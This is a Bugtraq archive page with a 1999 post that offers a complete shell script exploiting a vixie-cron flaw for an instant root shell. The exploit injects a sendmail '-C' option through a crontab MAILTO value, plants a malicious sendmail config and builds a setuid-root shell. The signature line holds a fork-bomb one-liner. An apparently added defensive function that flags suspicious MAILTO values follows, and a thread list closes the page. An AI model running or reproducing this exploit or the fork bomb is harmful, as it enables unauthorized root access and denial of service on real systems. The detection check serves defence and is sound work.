Bugtraq mailing list archives
Root shell vixie cron exploit
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 5 Jul 1999 14:20:49 +0200
For script kiddiez, here's an exploit for the recent vixie-cron vulnerability, giving an instant root shell. I thought it would help script kiddies, but as Martin Schulze included an almost step-by-step guide on how to abuse Sendmail flags, this exploit won't bring anything shocking - it's simply a working example.

** Official statement on my hwclock settings: the RTC on my mainboard is
** broken, and I have no cash to replace it with a working one :( Just
** excuse the stupid 'Date:' fields in some of my postings...

_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl]
bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
To iterate is human, to recurse divine [P. Deutsch]

#!/bin/sh
clear
echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries <marchew () dione ids pl>'
echo 'Stumilowy Las Team <100milowy () gdynia ids pl>'
echo '---------------------------- presents ----------------------------'
echo
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf () ids pl> =-'
echo
echo '[+] Checking dependencies:'
echo -n ' [*] vixie crontab: '
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi
echo -n ' [*] Berkeley Sendmail: '
if [ -f /usr/sbin/sendmail ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi
echo -n ' [*] gcc compiler: '
if [ -x /usr/bin/gcc ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi
echo ' [?] Dependencies not verified:'
echo ' [*] proper version of vixie crontab'
echo ' [*] writable /tmp without noexec/nosuid option'
echo '[+] Exploit started.'

echo "[+] Setting up .cf file for sendmail..."
# Alternate sendmail.cf: the local mailer becomes /tmp/vixie-root, run as uid 0.
# sendmail needs tabs between the LHS, RHS and comment fields of an R line.
cat >/tmp/vixie-cf <<'__eof__'
V7/Berkeley
O QueueDirectory=/tmp
O DefaultUser=0:0
R$+	$#local $: $1	regular local names
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40, T=DNS/RFC822/X-Unix, A=vixie-root
__eof__

echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'
# Runs as root under the evil .cf: compiles the launcher and makes it setuid root.
cat >/tmp/vixie-root <<'__eof__'
#!/bin/sh
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__
chmod 755 /tmp/vixie-root

echo '[+] Setting up phase #2 tool (rootshell launcher)...'
cat >/tmp/vixie-own3d.c <<'__eof__'
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    unlink("/tmp/vixie-own3d");   /* remove the setuid binary once launched */
    execl("/bin/sh", "sh", "-i", (char *)0);
    return 1;
}
__eof__

echo '[+] Putting evil crontab entry...'
# MAILTO ends up on sendmail's command line, so '-C' points it at our .cf.
crontab - <<'__eof__'
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__

echo '[+] Patience is a virtue... Wait up to 60 seconds.'
ILE=0
echo -n '[+] Tick.'
while [ "$ILE" -lt 50 ]; do
  sleep 2
  ILE=$((ILE + 1))
  test -f /tmp/vixie-own3d && ILE=1000   # stop early once the setuid shell appears
  echo -n '.'
done
echo

echo '[+] Huh, done. Removing crontab entry...'
crontab -r
echo '[+] Removing helper files...'
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* >/dev/null 2>&1
echo '[*] And now...'
if [ -f /tmp/vixie-own3d ]; then
  echo '[+] Entering root shell, babe :)'
  echo
  /tmp/vixie-own3d
  echo
else
  echo '[-] Oops, no root shell found, patched system or configuration problem :('
fi
echo '[*] Exploit done.'
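The exploit above works because vixie cron passes the crontab's MAILTO value straight onto sendmail's command line, where a value beginning with '-' is read as an option (-C here, loading an attacker-supplied .cf). The following is an added example, not part of Zalewski's post or of vixie cron itself: a small defender-side check that reads crontab text and flags any MAILTO value that would be parsed as an option or split into several arguments. The function name check_mailto and the sample crontab it is run against are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post: a defender-side check for the
# MAILTO abuse the exploit relies on. vixie cron hands the MAILTO value to
# sendmail on its command line, so a value that starts with '-' or contains
# whitespace can smuggle in sendmail options such as -C<alternate .cf>.
# check_mailto reads crontab text on stdin, prints every MAILTO value that
# looks like an option rather than an address, and exits 1 if it found any.

check_mailto() {
    # Keep only MAILTO assignments and drop the 'MAILTO=' prefix; crontab(5)
    # allows the value to be wrapped in single or double quotes, so strip those.
    sed -n 's/^[[:space:]]*MAILTO[[:space:]]*=[[:space:]]*//p' |
    sed "s/^'\(.*\)'\$/\1/; s/^\"\(.*\)\"\$/\1/" |
    awk '
        $0 == ""                { next }                      # empty MAILTO just disables mail
        substr($0, 1, 1) == "-" { print; bad = 1; next }      # parsed as a sendmail option
        /[ \t]/                 { print; bad = 1; next }      # one value becomes several argv entries
        END                     { exit bad ? 1 : 0 }
    '
}

# Constructed sample crontab (not taken from any real host): the entry the
# exploit installs, followed by a benign one.
sample_crontab() {
    cat <<'EOF'
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
MAILTO=root
0 * * * * /usr/bin/true
EOF
}

if sample_crontab | check_mailto; then
    echo "no suspicious MAILTO values"
else
    echo "suspicious MAILTO value(s) listed above"
fi
```

On a real host the same function can be pointed at /etc/crontab, the files under /etc/cron.d and the per-user spool (e.g. `check_mailto < /etc/crontab`); an empty MAILTO is deliberately accepted, since it only disables mail, and a leading '-' is what turns the address into a sendmail option.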
Current thread:
- Root shell vixie cron exploit Michal Zalewski (Jul 05)
- Re: Root shell vixie cron exploit Seva Gluschenko (Sep 01)
- Re: Root shell vixie cron exploit Michal Zalewski (Sep 01)
- Re: Root shell vixie cron exploit John Kennedy (Sep 03)
- Re: Root shell vixie cron exploit Peter Wemm (Sep 07)
- Re: Root shell vixie cron exploit Raymond Dijkxhoorn (Sep 07)
- Re: Root shell vixie cron exploit Christos Zoulas (Sep 03)
- [security-officer () FreeBSD ORG: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques] Patrick Oonk (Sep 03)
- Re: Root shell vixie cron exploit Valentin Nechayev (Sep 04)
- gftp Oscar Haeger (Sep 05)
- Re: gftp - ms ftp debug mode Bencsath Boldizsar (Sep 08)
(Thread continues...)